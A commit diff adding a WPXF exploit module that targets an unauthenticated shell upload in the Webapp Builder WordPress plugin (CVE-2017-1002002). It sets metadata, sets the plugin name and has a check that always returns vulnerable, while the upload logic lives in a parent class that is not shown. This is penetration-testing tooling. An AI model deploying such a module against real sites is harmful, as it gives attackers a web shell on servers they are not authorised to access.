Add Webapp Builder unauthenticated shell upload

Author: rastating

modules/exploits/webapp_builder_shell_upload.rb

@@ -0,0 +1,27 @@
+class Wpxf::Exploit::WebappBuilderShellUpload < Wpxf::Exploit::MobileAppNativeV3ShellUpload
+  def initialize
+    super
+
+    update_info(
+      name: 'Webapp Builder <= 2.0 Unauthenticated Shell Upload',
+      author: [
+        'Larry W. Cashdollar',            # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8773'],
+        ['CVE', '2017-1002002'],
+        ['URL', 'http://www.vapidlabs.com/advisory.php?v=182']
+      ],
+      date: 'Mar 01 2017'
+    )
+  end
+
+  def check
+    :vulnerable
+  end
+
+  def plugin_name
+    'webapp-builder'
+  end
+end